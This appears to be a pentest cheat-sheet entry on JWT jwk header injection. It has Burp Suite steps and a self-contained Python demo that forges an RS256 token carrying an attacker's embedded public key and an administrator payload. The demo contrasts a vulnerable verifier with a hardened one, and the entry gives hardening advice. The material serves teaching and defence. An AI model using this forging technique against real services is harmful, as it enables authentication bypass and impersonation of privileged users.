Attack Vectors
# JWT: change the signing key (jwk header injection)
- Send the request to Repeater in Burp Suite and ensure it contains a Token (JWT).
- Open the "JWT Editor" extension's "Keys" tab, click "New RSA Key", select "Generate" and then click "OK" to create an attacker-controlled RSA key pair.
- Return to Repeater and open the "JSON Web Token" tab.
- Modify the payload to include the desired changes.
- Select "Attack" > "Embedded JWK" and choose the generated key. The extension adds a `jwk` header containing your public key (and a matching `kid`) and re-signs the token with your private key.
- Send the modified request and attempt to access restricted resources. The attack only succeeds when the server takes the verification key from the token's own `jwk` header instead of from its trusted key set; a server that looks up `kid` against its own keys rejects the forged signature.
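The following is an added example, not part of the original page or of Burp's JWT Editor, that reproduces the above steps in code: it builds an RS256 token whose header embeds the attacker's public key, then runs it through a vulnerable verifier (which trusts the header's `jwk`) and a hardened one (which resolves `kid` only against server-side keys). RSA is implemented in pure Python with demo-sized 1024-bit keys so the example runs without third-party packages; that key size, the `kid` values and the payloads are assumptions made for the demonstration.

```python
import base64
import hashlib
import json
import random

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2 note 1).
_DIGESTINFO_SHA256 = bytes.fromhex("3031300d060960864801650304020105000420")


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _is_probable_prime(n: int, rounds: int = 16) -> bool:
    # Miller-Rabin; good enough for a demo key, not for production key generation.
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    while True:
        candidate = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(candidate):
            return candidate


def generate_rsa_key(bits: int = 1024) -> dict:
    # 1024-bit modulus is an assumption for speed; it is not a safe size.
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e != 0:
            return {"n": p * q, "e": e, "d": pow(e, -1, phi)}


def _emsa_pkcs1_v15(msg: bytes, k: int) -> int:
    # EM = 0x00 || 0x01 || PS (0xff...) || 0x00 || DigestInfo(SHA-256(msg))
    t = _DIGESTINFO_SHA256 + hashlib.sha256(msg).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")


def rs256_sign(signing_input: bytes, key: dict) -> bytes:
    k = (key["n"].bit_length() + 7) // 8
    return pow(_emsa_pkcs1_v15(signing_input, k), key["d"], key["n"]).to_bytes(k, "big")


def rs256_verify(signing_input: bytes, sig: bytes, n: int, e: int) -> bool:
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    return pow(int.from_bytes(sig, "big"), e, n) == _emsa_pkcs1_v15(signing_input, k)


def _int_to_b64url(i: int) -> str:
    return b64url(i.to_bytes((i.bit_length() + 7) // 8, "big"))


def _b64url_to_int(s: str) -> int:
    return int.from_bytes(b64url_decode(s), "big")


def encode_jwt(header: dict, payload: dict, key: dict) -> str:
    dumps = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = dumps(header) + "." + dumps(payload)
    return signing_input + "." + b64url(rs256_sign(signing_input.encode(), key))


def forge_with_embedded_jwk(payload: dict, attacker_key: dict, kid: str = "attacker-key") -> str:
    # What "Attack > Embedded JWK" does: publish our public key in the header,
    # then sign with the matching private key.
    jwk = {"kty": "RSA", "kid": kid,
           "e": _int_to_b64url(attacker_key["e"]), "n": _int_to_b64url(attacker_key["n"])}
    return encode_jwt({"alg": "RS256", "typ": "JWT", "kid": kid, "jwk": jwk}, payload, attacker_key)


def verify_vulnerable(token: str):
    # Vulnerable: the verification key comes from the token itself.
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    jwk = header.get("jwk")
    if header.get("alg") != "RS256" or not jwk:
        return None
    n, e = _b64url_to_int(jwk["n"]), _b64url_to_int(jwk["e"])
    return json.loads(b64url_decode(p)) if rs256_verify(f"{h}.{p}".encode(), b64url_decode(s), n, e) else None


def verify_hardened(token: str, trusted_keys: dict):
    # Hardened: pin the algorithm, ignore any header jwk, resolve kid server-side only.
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    key = trusted_keys.get(header.get("kid"))
    if header.get("alg") != "RS256" or key is None:
        return None
    return json.loads(b64url_decode(p)) if rs256_verify(f"{h}.{p}".encode(), b64url_decode(s), key["n"], key["e"]) else None


if __name__ == "__main__":
    attacker, server = generate_rsa_key(), generate_rsa_key()
    forged = forge_with_embedded_jwk({"sub": "administrator"}, attacker)
    print("vulnerable verifier:", verify_vulnerable(forged))
    print("hardened verifier:  ", verify_hardened(forged, {"server-key-1": server}))
```

The hardened verifier still accepts a token that reuses a trusted `kid` but carries an attacker signature only if the signature checks against the server's own key, which it will not; the embedded `jwk` is never consulted. Real services should apply the same rule to `jku` and `x5u` headers: keys must come from server-side configuration, not from the token.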
---------------------------------------------------------------------------------